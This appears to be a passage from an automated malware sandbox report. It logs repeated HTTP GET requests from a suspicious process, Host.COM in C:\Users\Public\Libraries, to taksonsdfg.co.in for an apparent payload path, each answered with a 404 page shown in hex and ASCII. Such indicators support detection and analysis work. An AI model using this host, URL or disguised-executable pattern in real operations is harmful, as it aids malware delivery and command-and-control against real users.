                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:47 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    79192.168.2.450162108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:48 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:48 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:48 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:48 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:48 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    80192.168.2.450164108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:49 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:50 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:49 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:50 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:50 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    81192.168.2.450166108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:50 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:51 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:51 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:51 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:51 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    82192.168.2.450168108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:52 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:52 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:52 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:52 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:52 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    83192.168.2.450170108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:53 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:53 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:53 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:53 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:53 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    84192.168.2.450172108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:54 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:54 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:54 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:54 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:54 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    85192.168.2.450174108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:30:55 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:30:55 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:30:55 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:30:55 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:30:55 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
